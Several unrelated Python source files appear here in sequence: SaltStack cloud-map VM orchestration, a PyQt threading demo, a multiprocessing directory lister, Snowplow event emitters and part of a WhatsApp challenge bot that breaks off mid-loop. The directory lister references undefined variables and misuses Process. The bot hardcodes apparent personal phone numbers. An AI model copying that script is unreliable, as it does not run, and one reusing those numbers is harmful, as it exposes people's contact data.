for name, details in six.iteritems(vms):
exist.add((alias, driver, name))
if name not in ret["create"]:
continue
# The machine is set to be created. Does it already exist?
matching = get_matching_by_name(name)
if not matching:
continue
# A machine by the same name exists
for item in matching:
if name not in ret["create"]:
# Machine already removed
break
log.warning(
"'%s' already exists, removing from " "the create map.",
name,
)
if "existing" not in ret:
ret["existing"] = {}
ret["existing"][name] = ret["create"].pop(name)
if "hard" in self.opts and self.opts["hard"]:
if self.opts["enable_hard_maps"] is False:
raise SaltCloudSystemExit(
"The --hard map can be extremely dangerous to use, "
"and therefore must explicitly be enabled in the main "
"configuration file, by setting 'enable_hard_maps' "
"to True"
)
# Hard maps are enabled, Look for the items to delete.
ret["destroy"] = exist.difference(defined)
return ret
def run_map(self, dmap):
"""
Execute the contents of the VM map
"""
if self._has_loop(dmap):
msg = "Uh-oh, that cloud map has a dependency loop!"
log.error(msg)
raise SaltCloudException(msg)
# Go through the create list and calc dependencies
for key, val in six.iteritems(dmap["create"]):
log.info("Calculating dependencies for %s", key)
level = 0
level = self._calcdep(dmap, key, val, level)
log.debug("Got execution order %s for %s", level, key)
dmap["create"][key]["level"] = level
try:
existing_list = six.iteritems(dmap["existing"])
except KeyError:
existing_list = six.iteritems({})
for key, val in existing_list:
log.info("Calculating dependencies for %s", key)
level = 0
level = self._calcdep(dmap, key, val, level)
log.debug("Got execution order %s for %s", level, key)
dmap["existing"][key]["level"] = level
# Now sort the create list based on dependencies
create_list = sorted(six.iteritems(dmap["create"]), key=lambda x: x[1]["level"])
output = {}
if self.opts["parallel"]:
parallel_data = []
master_name = None
master_minion_name = None
master_host = None
master_finger = None
try:
master_name, master_profile = next(
(
(name, profile)
for name, profile in create_list
if profile.get("make_master", False) is True
)
)
master_minion_name = master_name
log.debug("Creating new master '%s'", master_name)
if (
salt.config.get_cloud_config_value("deploy", master_profile, self.opts)
is False
):
raise SaltCloudSystemExit(
"Cannot proceed with 'make_master' when salt deployment "
"is disabled(ex: --no-deploy)."
)
# Generate the master keys
log.debug("Generating master keys for '%s'", master_profile["name"])
priv, pub = salt.utils.cloud.gen_keys(
salt.config.get_cloud_config_value("keysize", master_profile, self.opts)
)
master_profile["master_pub"] = pub
master_profile["master_pem"] = priv
# Generate the fingerprint of the master pubkey in order to
# mitigate man-in-the-middle attacks
master_temp_pub = salt.utils.files.mkstemp()
with salt.utils.files.fopen(master_temp_pub, "w") as mtp:
mtp.write(pub)
master_finger = salt.utils.crypt.pem_finger(
master_temp_pub, sum_type=self.opts["hash_type"]
)
os.unlink(master_temp_pub)
if master_profile.get("make_minion", True) is True:
master_profile.setdefault("minion", {})
if "id" in master_profile["minion"]:
master_minion_name = master_profile["minion"]["id"]
# Set this minion's master as local if the user has not set it
if "master" not in master_profile["minion"]:
master_profile["minion"]["master"] = "127.0.0.1"
if master_finger is not None:
master_profile["master_finger"] = master_finger
# Generate the minion keys to pre-seed the master:
for name, profile in create_list:
make_minion = salt.config.get_cloud_config_value(
"make_minion", profile, self.opts, default=True
)
if make_minion is False:
continue
log.debug("Generating minion keys for '%s'", profile["name"])
priv, pub = salt.utils.cloud.gen_keys(
salt.config.get_cloud_config_value("keysize", profile, self.opts)
)
profile["pub_key"] = pub
profile["priv_key"] = priv
# Store the minion's public key in order to be pre-seeded in
# the master
master_profile.setdefault("preseed_minion_keys", {})
master_profile["preseed_minion_keys"].update({name: pub})
local_master = False
if (
master_profile["minion"].get("local_master", False)
and master_profile["minion"].get("master", None) is not None
):
# The minion is explicitly defining a master and it's
# explicitly saying it's the local one
local_master = True
out = self.create(master_profile, local_master=local_master)
if not isinstance(out, dict):
log.debug(
"Master creation details is not a dictionary: {0}".format(out)
)
elif "Errors" in out:
raise SaltCloudSystemExit(
"An error occurred while creating the master, not "
"continuing: {0}".format(out["Errors"])
)
deploy_kwargs = (
self.opts.get("show_deploy_args", False) is True
and
# Get the needed data
out.get("deploy_kwargs", {})
or
# Strip the deploy_kwargs from the returned data since we don't
# want it shown in the console.
out.pop("deploy_kwargs", {})
)
master_host = deploy_kwargs.get(
"salt_host", deploy_kwargs.get("host", None)
)
if master_host is None:
raise SaltCloudSystemExit(
"Host for new master {0} was not found, "
"aborting map".format(master_name)
)
output[master_name] = out
except StopIteration:
log.debug("No make_master found in map")
# Local master?
# Generate the fingerprint of the master pubkey in order to
# mitigate man-in-the-middle attacks
master_pub = os.path.join(self.opts["pki_dir"], "master.pub")
if os.path.isfile(master_pub):
master_finger = salt.utils.crypt.pem_finger(
master_pub, sum_type=self.opts["hash_type"]
)
opts = self.opts.copy()
if self.opts["parallel"]:
# Force display_ssh_output to be False since the console will
# need to be reset afterwards
log.info(
"Since parallel deployment is in use, ssh console output "
"is disabled. All ssh output will be logged though"
)
opts["display_ssh_output"] = False
local_master = master_name is None
for name, profile in create_list:
if name in (master_name, master_minion_name):
# Already deployed, it's the master's minion
continue
if (
"minion" in profile
and profile["minion"].get("local_master", False)
and profile["minion"].get("master", None) is not None
):
# The minion is explicitly defining a master and it's
# explicitly saying it's the local one
local_master = True
if master_finger is not None and local_master is False:
profile["master_finger"] = master_finger
if master_host is not None:
profile.setdefault("minion", {})
profile["minion"].setdefault("master", master_host)
if self.opts["parallel"]:
parallel_data.append(
{
"opts": opts,
"name": name,
"profile": profile,
"local_master": local_master,
}
)
continue
# Not deploying in parallel
try:
output[name] = self.create(profile, local_master=local_master)
if (
self.opts.get("show_deploy_args", False) is False
and "deploy_kwargs" in output
and isinstance(output[name], dict)
):
output[name].pop("deploy_kwargs", None)
except SaltCloudException as exc:
log.error(
"Failed to deploy '%s'. Error: %s",
name,
exc,
exc_info_on_loglevel=logging.DEBUG,
)
output[name] = {"Error": str(exc)}
for name in dmap.get("destroy", ()):
output[name] = self.destroy(name)
if self.opts["parallel"] and parallel_data:
if "pool_size" in self.opts:
pool_size = self.opts["pool_size"]
else:
pool_size = len(parallel_data)
log.info("Cloud pool size: %s", pool_size)
output_multip = enter_mainloop(
_create_multiprocessing, parallel_data, pool_size=pool_size
)
# We have deployed in parallel, now do start action in
# correct order based on dependencies.
if self.opts["start_action"]:
actionlist = []
grp = -1
for key, val in groupby(
six.itervalues(dmap["create"]), lambda x: x["level"]
):
actionlist.append([])
grp += 1
for item in val:
actionlist[grp].append(item["name"])
out = {}
for group in actionlist:
log.info(
"Running %s on %s", self.opts["start_action"], ", ".join(group)
)
client = salt.client.get_local_client()
out.update(
client.cmd(
",".join(group),
self.opts["start_action"],
timeout=self.opts["timeout"] * 60,
tgt_type="list",
)
)
for obj in output_multip:
next(six.itervalues(obj))["ret"] = out[next(six.iterkeys(obj))]
output.update(obj)
else:
for obj in output_multip:
output.update(obj)
return output
def init_pool_worker():
"""
Make every worker ignore KeyboarInterrup's since it will be handled by the
parent process.
"""
signal.signal(signal.SIGINT, signal.SIG_IGN)
def create_multiprocessing(parallel_data, queue=None):
"""
This function will be called from another process when running a map in
parallel mode. The result from the create is always a json object.
"""
salt.utils.crypt.reinit_crypto()
parallel_data["opts"]["output"] = "json"
cloud = Cloud(parallel_data["opts"])
try:
output = cloud.create(
parallel_data["profile"], local_master=parallel_data["local_master"]
)
except SaltCloudException as exc:
log.error(
"Failed to deploy '%s'. Error: %s",
parallel_data["name"],
exc,
exc_info_on_loglevel=logging.DEBUG,
)
return {parallel_data["name"]: {"Error": str(exc)}}
if parallel_data["opts"].get("show_deploy_args", False) is False and isinstance(
output, dict
):
output.pop("deploy_kwargs", None)
return {parallel_data["name"]: salt.utils.data.simple_types_filter(output)}
def destroy_multiprocessing(parallel_data, queue=None):
"""
This function will be called from another process when running a map in
parallel mode. The result from the destroy is always a json object.
"""
salt.utils.crypt.reinit_crypto()
parallel_data["opts"]["output"] = "json"
clouds = salt.loader.clouds(parallel_data["opts"])
try:
fun = clouds["{0}.destroy".format(parallel_data["driver"])]
with salt.utils.context.func_globals_inject(
fun,
__active_provider_name__=":".join(
[parallel_data["alias"], parallel_data["driver"]]
),
):
output = fun(parallel_data["name"])
except SaltCloudException as exc:
log.error(
"Failed to destroy %s. Error: %s",
parallel_data["name"],
exc,
exc_info_on_loglevel=logging.DEBUG,
)
return {parallel_data["name"]: {"Error": str(exc)}}
return {parallel_data["name"]: salt.utils.data.simple_types_filter(output)}
def run_parallel_map_providers_query(data, queue=None):
"""
This function will be called from another process when building the
providers map.
"""
salt.utils.crypt.reinit_crypto()
cloud = Cloud(data["opts"])
try:
with salt.utils.context.func_globals_inject(
cloud.clouds[data["fun"]],
__active_provider_name__=":".join([data["alias"], data["driver"]]),
):
return (
data["alias"],
data["driver"],
salt.utils.data.simple_types_filter(cloud.clouds[data["fun"]]()),
)
except Exception as err: # pylint: disable=broad-except
log.debug(
"Failed to execute '%s()' while querying for running nodes: %s",
data["fun"],
err,
exc_info_on_loglevel=logging.DEBUG,
)
# Failed to communicate with the provider, don't list any nodes
return data["alias"], data["driver"], ()
# for pickle and multiprocessing, we can't use directly decorators
def _run_parallel_map_providers_query(*args, **kw):
return communicator(run_parallel_map_providers_query)(*args[0], **kw)
def _destroy_multiprocessing(*args, **kw):
return communicator(destroy_multiprocessing)(*args[0], **kw)
def _create_multiprocessing(*args, **kw):
return communicator(create_multiprocessing)(*args[0], **kw)
|
QLabel_setText__in_thread__threading.py
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
__author__ = 'ipetrash'
import threading
import time
from PyQt5.Qt import QMainWindow, QLabel, QFont, QApplication, Qt
class MainWindow(QMainWindow):
def __init__(self):
super().__init__()
self.label = QLabel()
self.label.setAlignment(Qt.AlignCenter)
self.label.setFont(QFont('Courier', 25))
def loop():
i = 0
while True:
self.label.setText(str(i))
i += 1
time.sleep(1)
thread = threading.Thread(target=loop, daemon=True)
thread.start()
self.setCentralWidget(self.label)
if __name__ == '__main__':
app = QApplication([])
mw = MainWindow()
mw.show()
app.exec()
|
listdirs.py
|
from pathlib import Path
from pprint import pprint
import time
from multiprocessing import (Process, JoinableQueue as Queue, freeze_support)
from time import sleep
import sys
from bripy.bllb.logging import get_dbg, setup_logging
logger = setup_logging(True, "INFO", loguru_enqueue=True)
DBG = get_dbg(logger)
basepath = '.'
NUMBER_OF_PROCESSES = 1
def worker(input_q, output_q):
while True or not input_q.empty() or input_q.qsize():
item = input_q.get()
if not item:
sleep(0.05)
DBG('no item')
continue
if item == 'STOP':
logger.info('Stopping...')
input_q.task_done()
return
DBG(item)
path = Path(item)
dirs = map(str, filter(Path.is_dir, path.iterdir()))
[*map(input_q.put, dirs)]
output_q.put(item)
input_q.task_done()
def get_q(q):
results = []
while not q.empty() or q.qsize():
item = q.get()
if item == 'STOP':
DBG('STOP get_q')
q.task_done()
break
DBG(item)
if item:
results.append(item)
q.task_done()
return results
@logger.catch
def main():
s = time.perf_counter()
task_q = Queue()
done_q = Queue()
task_q.put(basepath)
processes = [
Process(target=worker, args=(task_q, done_q))
for _ in range(NUMBER_OF_PROCESSES)
]
for process in processes:
process.start()
while not task_q.empty() or task_q.qsize():
DBG(task_q.qsize())
sleep(0.05)
logger.info(f'task_q qsize: {task_q.qsize()}')
task_q.join()
for _ in range(NUMBER_OF_PROCESSES):
task_q.put('STOP')
while not task_q.empty() or task_q.qsize() or any(map(lambda p: p.is_alive(), processes)):
DBG(task_q.qsize())
sleep(0.05)
for process in processes:
process.terminate()
for process in processes:
process.close()
for process in processes:
try:
process.join()
except ValueError:
...
print(f'done_q qsize: {done_q.qsize()}')
sleep(0.05)
future = Process(target=get_q, args=(done_q,))
done_q.put('STOP')
done_q.join()
dir_list = future.result()
dir_set = set(dir_list)
print(f'done_q qsize: {done_q.qsize()}')
print(f'dir_list: {len(dir_list)}')
print(f'dir_set: {len(dir_set)}')
print(f'done_q count: {j}')
print(f'done_q sum count: {i}')
all_items = [*Path(basepath).rglob('*')]
dir_items = [*filter(Path.is_dir, all_items)]
dir_items_set = set([str(Path(item).resolve()) for item in dir_items])
print(f'dir items set: {len(dir_items_set)}')
print(f'dir items: {len(dir_items)}')
print(f'Total items: {len(all_items)}')
diff = dir_items_set - dir_set
print(f'diff: {diff}')
diff2 = dir_set - dir_items_set
print(f'diff2: {diff2}')
elapsed = time.perf_counter() - s
print(f"{__file__} executed in {elapsed:0.2f} seconds.".format())
if __name__ == '__main__':
freeze_support()
sys.exit(main())
|
emitters.py
|
"""
emitters.py
Copyright (c) 2013-2019 Snowplow Analytics Ltd. All rights reserved.
This program is licensed to you under the Apache License Version 2.0,
and you may not use this file except in compliance with the Apache License
Version 2.0. You may obtain a copy of the Apache License Version 2.0 at
http://www.apache.org/licenses/LICENSE-2.0.
Unless required by applicable law or agreed to in writing,
software distributed under the Apache License Version 2.0 is distributed on
an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either
express or implied. See the Apache License Version 2.0 for the specific
language governing permissions and limitations there under.
Authors: Anuj More, Alex Dean, Fred Blundun
Copyright: Copyright (c) 2013-2019 Snowplow Analytics Ltd
License: Apache License Version 2.0
"""
import json
import logging
import time
import threading
try:
# Python 2
from Queue import Queue
except ImportError:
# Python 3
from queue import Queue
import redis
import requests
from contracts import contract, new_contract
from snowplow_tracker.self_describing_json import SelfDescribingJson
logger = logging.getLogger(__name__)
logger.setLevel(logging.INFO)
DEFAULT_MAX_LENGTH = 10
PAYLOAD_DATA_SCHEMA = "iglu:com.snowplowanalytics.snowplow/payload_data/jsonschema/1-0-4"
new_contract("protocol", lambda x: x == "http" or x == "https")
new_contract("method", lambda x: x == "get" or x == "post")
new_contract("function", lambda x: hasattr(x, "__call__"))
new_contract("redis", lambda x: isinstance(x, (redis.Redis, redis.StrictRedis)))
class Emitter(object):
"""
Synchronously send Snowplow events to a Snowplow collector
Supports both GET and POST requests
"""
@contract
def __init__(self, endpoint, protocol="http", port=None, method="get", buffer_size=None, on_success=None, on_failure=None, byte_limit=None):
"""
:param endpoint: The collector URL. Don't include "http://" - this is done automatically.
:type endpoint: string
:param protocol: The protocol to use - http or https. Defaults to http.
:type protocol: protocol
:param port: The collector port to connect to
:type port: int | None
:param method: The HTTP request method
:type method: method
:param buffer_size: The maximum number of queued events before the buffer is flushed. Default is 10.
:type buffer_size: int | None
:param on_success: Callback executed after every HTTP request in a flush has status code 200
Gets passed the number of events flushed.
:type on_success: function | None
:param on_failure: Callback executed if at least one HTTP request in a flush has status code other than 200
Gets passed two arguments:
1) The number of events which were successfully sent
2) If method is "post": The unsent data in string form;
If method is "get": An array of dictionaries corresponding to the unsent events' payloads
:type on_failure: function | None
:param byte_limit: The size event list after reaching which queued events will be flushed
:type byte_limit: int | None
"""
self.endpoint = Emitter.as_collector_uri(endpoint, protocol, port, method)
self.method = method
if buffer_size is None:
if method == "post":
buffer_size = DEFAULT_MAX_LENGTH
else:
buffer_size = 1
self.buffer_size = buffer_size
self.buffer = []
self.byte_limit = byte_limit
self.bytes_queued = None if byte_limit is None else 0
self.on_success = on_success
self.on_failure = on_failure
self.lock = threading.RLock()
self.timer = None
logger.info("Emitter initialized with endpoint " + self.endpoint)
@staticmethod
@contract
def as_collector_uri(endpoint, protocol="http", port=None, method="get"):
"""
:param endpoint: The raw endpoint provided by the user
:type endpoint: string
:param protocol: The protocol to use - http or https
:type protocol: protocol
:param port: The collector port to connect to
:type port: int | None
:param method: Either `get` or `post` HTTP method
:type method: method
:rtype: string
"""
if method == "get":
path = "/i"
else:
path = "/com.snowplowanalytics.snowplow/tp2"
if port is None:
return protocol + "://" + endpoint + path
else:
return protocol + "://" + endpoint + ":" + str(port) + path
@contract
def input(self, payload):
"""
Adds an event to the buffer.
If the maximum size has been reached, flushes the buffer.
:param payload: The name-value pairs for the event
:type payload: dict(string:*)
"""
with self.lock:
if self.bytes_queued is not None:
self.bytes_queued += len(str(payload))
if self.method == "post":
self.buffer.append({key: str(payload[key]) for key in payload})
else:
self.buffer.append(payload)
if self.reached_limit():
self.flush()
def reached_limit(self):
"""
Checks if event-size or bytes limit are reached
:rtype: bool
"""
if self.byte_limit is None:
return len(self.buffer) >= self.buffer_size
else:
return self.bytes_queued >= self.byte_limit or len(self.buffer) >= self.buffer_size
def flush(self):
"""
Sends all events in the buffer to the collector.
"""
with self.lock:
self.send_events(self.buffer)
self.buffer = []
if self.bytes_queued is not None:
self.bytes_queued = 0
@contract
def http_post(self, data):
"""
:param data: The array of JSONs to be sent
:type data: string
"""
logger.info("Sending POST request to %s..." % self.endpoint)
logger.debug("Payload: %s" % data)
r = requests.post(self.endpoint, data=data, headers={'content-type': 'application/json; charset=utf-8'})
getattr(logger, "info" if self.is_good_status_code(r.status_code) else "warn")("POST request finished with status code: " + str(r.status_code))
return r
@contract
def http_get(self, payload):
"""
:param payload: The event properties
:type payload: dict(string:*)
"""
logger.info("Sending GET request to %s..." % self.endpoint)
logger.debug("Payload: %s" % payload)
r = requests.get(self.endpoint, params=payload)
getattr(logger, "info" if self.is_good_status_code(r.status_code) else "warn")("GET request finished with status code: " + str(r.status_code))
return r
def sync_flush(self):
"""
Calls the flush method of the base Emitter class.
This is guaranteed to be blocking, not asynchronous.
"""
logger.debug("Starting synchronous flush...")
Emitter.flush(self)
logger.info("Finished synchrous flush")
@staticmethod
@contract
def is_good_status_code(status_code):
"""
:param status_code: HTTP status code
:type status_code: int
:rtype: bool
"""
return 200 <= status_code < 400
@contract
def send_events(self, evts):
"""
:param evts: Array of events to be sent
:type evts: list(dict(string:*))
"""
if len(evts) > 0:
logger.info("Attempting to send %s requests" % len(evts))
Emitter.attach_sent_timestamp(evts)
if self.method == 'post':
data = SelfDescribingJson(PAYLOAD_DATA_SCHEMA, evts).to_string()
post_succeeded = False
try:
status_code = self.http_post(data).status_code
post_succeeded = self.is_good_status_code(status_code)
except requests.RequestException as e:
logger.warn(e)
if post_succeeded:
if self.on_success is not None:
self.on_success(len(evts))
elif self.on_failure is not None:
self.on_failure(0, evts)
elif self.method == 'get':
success_count = 0
unsent_requests = []
for evt in evts:
get_succeeded = False
try:
status_code = self.http_get(evt).status_code
get_succeeded = self.is_good_status_code(status_code)
except requests.RequestException as e:
logger.warn(e)
if get_succeeded:
success_count += 1
else:
unsent_requests.append(evt)
if len(unsent_requests) == 0:
if self.on_success is not None:
self.on_success(success_count)
elif self.on_failure is not None:
self.on_failure(success_count, unsent_requests)
else:
logger.info("Skipping flush since buffer is empty")
@contract
def set_flush_timer(self, timeout, flush_now=False):
"""
Set an interval at which the buffer will be flushed
:param timeout: interval in seconds
:type timeout: int | float
:param flush_now: immediately flush buffer
:type flush_now: bool
"""
# Repeatable create new timer
if flush_now:
self.flush()
self.timer = threading.Timer(timeout, self.set_flush_timer, [timeout, True])
self.timer.daemon = True
self.timer.start()
def cancel_flush_timer(self):
"""
Abort automatic async flushing
"""
if self.timer is not None:
self.timer.cancel()
@staticmethod
def attach_sent_timestamp(events):
"""
Attach (by mutating in-place) current timestamp in milliseconds
as `stm` param
:param events: Array of events to be sent
:type events: list(dict(string:*))
:rtype: None
"""
def update(e):
e.update({'stm': str(int(time.time()) * 1000)})
[update(event) for event in events]
class AsyncEmitter(Emitter):
"""
Uses threads to send HTTP requests asynchronously
"""
@contract
def __init__(
self,
endpoint,
protocol="http",
port=None,
method="get",
buffer_size=None,
on_success=None,
on_failure=None,
thread_count=1,
byte_limit=None):
"""
:param endpoint: The collector URL. Don't include "http://" - this is done automatically.
:type endpoint: string
:param protocol: The protocol to use - http or https. Defaults to http.
:type protocol: protocol
:param port: The collector port to connect to
:type port: int | None
:param method: The HTTP request method
:type method: method
:param buffer_size: The maximum number of queued events before the buffer is flushed. Default is 10.
:type buffer_size: int | None
:param on_success: Callback executed after every HTTP request in a flush has status code 200
Gets passed the number of events flushed.
:type on_success: function | None
:param on_failure: Callback executed if at least one HTTP request in a flush has status code other than 200
Gets passed two arguments:
1) The number of events which were successfully sent
2) If method is "post": The unsent data in string form;
If method is "get": An array of dictionaries corresponding to the unsent events' payloads
:type on_failure: function | None
:param thread_count: Number of worker threads to use for HTTP requests
:type thread_count: int
:param byte_limit: The size event list after reaching which queued events will be flushed
:type byte_limit: int | None
"""
super(AsyncEmitter, self).__init__(endpoint, protocol, port, method, buffer_size, on_success, on_failure, byte_limit)
self.queue = Queue()
for i in range(thread_count):
t = threading.Thread(target=self.consume)
t.daemon = True
t.start()
def sync_flush(self):
while True:
self.flush()
self.queue.join()
if len(self.buffer) < 1:
break
def flush(self):
"""
Removes all dead threads, then creates a new thread which
executes the flush method of the base Emitter class
"""
with self.lock:
self.queue.put(self.buffer)
self.buffer = []
if self.bytes_queued is not None:
self.bytes_queued = 0
def consume(self):
while True:
evts = self.queue.get()
self.send_events(evts)
self.queue.task_done()
class CeleryEmitter(Emitter):
"""
Uses a Celery worker to send HTTP requests asynchronously.
Works like the base Emitter class,
but on_success and on_failure callbacks cannot be set.
"""
celery_app = None
def __init__(self, endpoint, protocol="http", port=None, method="get", buffer_size=None, byte_limit=None):
super(CeleryEmitter, self).__init__(endpoint, protocol, port, method, buffer_size, None, None, byte_limit)
try:
# Check whether a custom Celery configuration module named "snowplow_celery_config" exists
import snowplow_celery_config
self.celery_app = Celery()
self.celery_app.config_from_object(snowplow_celery_config)
except ImportError:
# Otherwise configure Celery with default settings
self.celery_app = Celery("Snowplow", broker="redis://guest@localhost//")
self.async_flush = self.celery_app.task(self.async_flush)
def flush(self):
"""
Schedules a flush task
"""
self.async_flush.delay()
logger.info("Scheduled a Celery task to flush the event queue")
def async_flush(self):
super(CeleryEmitter, self).flush()
class RedisEmitter(object):
"""
Sends Snowplow events to a Redis database
"""
@contract
def __init__(self, rdb=None, key="snowplow"):
"""
:param rdb: Optional custom Redis database
:type rdb: redis | None
:param key: The Redis key for the list of events
:type key: string
"""
if rdb is None:
rdb = redis.StrictRedis()
self.rdb = rdb
self.key = key
@contract
def input(self, payload):
"""
:param payload: The event properties
:type payload: dict(string:*)
"""
logger.debug("Pushing event to Redis queue...")
self.rdb.rpush(self.key, json.dumps(payload))
logger.info("Finished sending event to Redis.")
def flush(self):
logger.warn("The RedisEmitter class does not need to be flushed")
def sync_flush(self):
self.flush()
|
Challenge18Service.py
|
# Challenge18Service.py
# from app import Service
# from ctparse import ctparemidrse
# from datetime import datetime
from bs4 import BeautifulSoup
import requests
from dateparser.search import search_dates
import time
import datetime
import re
import random
import json
import emoji
from threading import Thread
import traceback
from pprint import pprint as pp
import C18Tasks
from flask import Flask, render_template, redirect, request, jsonify
from flask_jwt_extended import create_access_token
from flask_jwt_extended import get_jwt_identity
from flask_jwt_extended import jwt_required
from flask_jwt_extended import JWTManager
# from Challenge18Manager import Challenge18Manager
from urllib.request import urlopen, Request, quote
known = {"morning": "at 08:00", "afternoon": "at 16:00", "evening": "at 18:00",
"in in": "in", "at at": "at", "בבוקר": "08:00", "בצהריים": "12:00", "בערב": "18:00"}
days = "Sunday,Monday,Tuesday,Wednesday,Thursday,Friday,Saturday".split(",")
cFormat = {"today": -1, "upcoming": {}}
# class Challenge18Service(Service):
'''
# at 20:00
Monday : Day 1
Tuesday : Day 2
Wednesday : Day 3
Thursday : Day 4
Friday : Day 4.5
Saturday : Day 5
Sunday : Day 6
Monday : Day 7
Tuesday : Day 8
Wednesday : Day 9
Thursday : Day 10
Friday : Day 10.5
Saturday : Day 11
Sunday : Day 12
Monday : Day 13
Tuesday : Day 14
Wednesday : Day 15
Thursday : Day 16
Friday : Day 16.5
Saturday : Day 17
Sunday : Day 18
'''
# from Challenge18Service import *
# site = "https://www.youtube.com/watch?v=QkF3oxziUI4&ab_channel=LedZeppelin"
# views(site)
def views(url):
# url = "https://www.youtube.com/watch?v=QkF3oxziUI4&ab_channel=LedZeppelin"
t = time.time()
headers_Get = {
'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:49.0) Gecko/20100101 Firefox/49.0',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
'Accept-Language': 'en-US,en;q=0.5',
'Accept-Encoding': 'gzip, deflate',
'DNT': '1',
'Connection': 'keep-alive',
'Upgrade-Insecure-Requests': '1'
}
with requests.Session() as session:
res=session.get(url, headers=headers_Get,cookies={'CONSENT': 'YES+cb.20210328-17-p0.en-GB+FX+{}'.format(random.randint(100, 999))})
numOfViews = -1
try:
x = res.text.split("viewCount")[4][2:].split(",\"")[0]
numOfViews = json.loads(x)["simpleText"]
except :
traceback.print_exc()
return -1
# res = urlopen(url)
# html = res.read()
# wordBreak = ['<','>']
# for i in range(len(html)):
# if html[i] in wordBreak:
# html[i] = ' '
#
# html = html.split()
# dataSwitch = False
# numOfViews = ''
# for element in html:
# if element == '/div':
# dataSwitch = False
# if dataSwitch:
# numOfViews += str(element)
# if "view-count" in str(element):
# dataSwitch = True
# print(numOfViews, " Views - Time: ",time.time()-t)
return numOfViews
class Challenge18Service():
id = "Challenge18"
name = "🙏🌍 Challenge18 🐋🌸 "
welcome = "*Welcome to 🙏🌍 Challenge18 🐋🌸* \n*שלחו* הודעה ואנחנו כבר נזכיר לכם :)"
help = "Challenge18 help message"
shortDescription = "Get your Challenge18 as whatsapp messages!"
imageurl = "https://i.imgur.com/YdXGl4K.jpg"
share = None
addMasters = ["972547932000", "972559721123"]
# examples = {"example1":{"text":"","thumbnail":None, "answer":"This is awesome in 5 seconds"}, "example2":{"text":"","thumbnail":None, "answer":"להתקשר לברוך מחר בבוקר"}}
examples = {}
emojiValues = {1: "@🧡❤️💛💚💙💜🖤🤍🤎💔❣️💕💞💓💗💖💘💝💐🌷🌹🥀🌺🌸🌼🌻🪴🎍🍀☘️🌱🌿🌴🎋🍃🌳🌲🎄🌵",
2: "🍒",
3: "🌎🌍🌏🌐⚽👂🏃🏃♀️👟💸💵💴💶💷💰💳💎💲🤑📱🤳📲📞☎️📴📳📵💡🏐🏀🏈⚾🥎🎾🏉🎱🏓🥍🏏⛹️♀️⛹️🏌️♀️🏌️🥥🐜",
18: "🤹♀️🤹♂️🥇⌛",
10: "🎥",
17: "️👣",
180: "🕉️"}
daysToSkip = [4,10,16]
push = {"international": C18Tasks.international, "Hebrew": C18Tasks.hebrew, "Family": C18Tasks.familyEng, "FamilyHeb": C18Tasks.familyHeb, "SongValuesHeb":C18Tasks.songValuesHeb}
debug = False
simulation = False
def __init__(self, db, api, master):
Challenge18Service.share = self
self.db = db
self.api = api
# if "upcoming" not in self.db or "dict" not in str(type(self.db["upcoming"])):
# self.db["upcoming"] = {}
# if "users" not in self.db:
# self.db["users"] = {}
self.id = Challenge18Service.id
self.name = Challenge18Service.name
self.welcome = Challenge18Service.welcome
self.imageurl = Challenge18Service.imageurl
# self.emojiValues = Challenge18Service.emojiValues
# self.help = Challenge18Service.help
self.managePush()
self.commands = {"#totalPoints":self.sendTotal,"#totalPointsHeb":self.sendTotalHeb, "#public":self.sendPublic}
# self.manager = Challenge18Manager.share
self.manager = None
self.master = master
self.excludeNumbers = ["972559721123@c.us"]
# self.excludeNumbers = []
def halfday(self, day):
return day/.5 % 2 == 1
def updateDay(self, current, ch = None):
if ch is not None and ch in self.db["challenges"]:
challenge = self.db["challenges"][ch]
if "skipShabbat" in challenge and str(challenge["skipShabbat"]).lower() in ["true","1"]: #Edit/skipShabbat/true
if current in self.daysToSkip :
return current + .5 # SKIPS SHABBAT
if self.halfday(current):
return int(current + .5)
return int(current + 1)
def managePush(self):
p = Thread(target=self.managePushAsync, args=[None])
p.start()
def getChallenge(self,info):
res = {}
origin, user, content = None, None, None
if "origin" in info:
origin = info["origin"]
# if "user" in info:
# user = info["user"]
# if "content" in info:
# content = info["content"]
res["users"] = {}
res["total"] = 0
res["scores"] = []
res["day"] = None
if origin in self.db["challenges"]:
if "today" in self.db["challenges"][origin]:
res["day"] = self.db["challenges"][origin]["today"]
if "template" in self.db["challenges"][origin]:
res["template"] = self.db["challenges"][origin]["template"]
try:
print("OOOOOOOOOOOOOOOOOOOOO",info)
print("OOOOOOOOOOOOOOOOOOOOO")
print("OOOOOOOOOOOOOOOOOOOOO")
print(":"+origin+":")
print("OOOOOOOOOOOOOOOOOOOOO")
print("OOOOOOOOOOOOOOOOOOOOO")
participants = self.master.driver.group_get_participants_ids(origin)
except :
traceback.print_exc()
participants = {}
if participants:
for user in participants:
userData = res["users"][user] = {}
if user in self.db["users"]:
u = self.db["users"][user]
if "score" in u:
res["scores"].append(u["score"])
res["total"]+=u["score"]
else:
res["scores"].append(0)
return res
def getChallengeScore(self,info):
res = {}
origin, user, content = None, None, None
if "origin" in info:
origin = info["origin"]
# if "user" in info:
# user = info["user"]
# if "content" in info:
# content = info["content"]
res["users"] = {}
res["total"] = 0
# res["scores"] = []
res["day"] = None
if origin in self.db["challenges"]:
if "today" in self.db["challenges"][origin]:
res["day"] = self.db["challenges"][origin]["today"]
if "template" in self.db["challenges"][origin]:
res["template"] = self.db["challenges"][origin]["template"]
try:
print("OOOOOOOOOOOOOOOOOOOOO",info)
print("OOOOOOOOOOOOOOOOOOOOO")
print("OOOOOOOOOOOOOOOOOOOOO")
print(":"+origin+":")
print("OOOOOOOOOOOOOOOOOOOOO")
print("OOOOOOOOOOOOOOOOOOOOO")
participants = self.master.driver.group_get_participants_ids(origin)
except :
traceback.print_exc()
participants = {}
if participants:
for user in participants:
# userData = res["users"][user] = {}
if user in self.db["users"]:
u = self.db["users"][user]
if "username" in u:
if "score" not in u:
self.db["users"][user]["score"] = 0
res["users"][u["username"]] = u["score"]
if "score" in u:
# res["scores"].append(u["score"])
res["total"]+=u["score"]
# else:
# res["scores"].append(0)
return res
def managePushAsync(self, data):
needsBackup = False
while "challenges" not in self.db:
time.sleep(1)
print("##################################")
print("##################################")
print("##################################")
print("MANAGING PUSH FOR C18")
lastHour = 60 * 60
while(True):
simCounter = 0
while self.simulation:
if simCounter < 10:
simCounter += 1
time.sleep(0.1)
print("SIMULATION")
else:
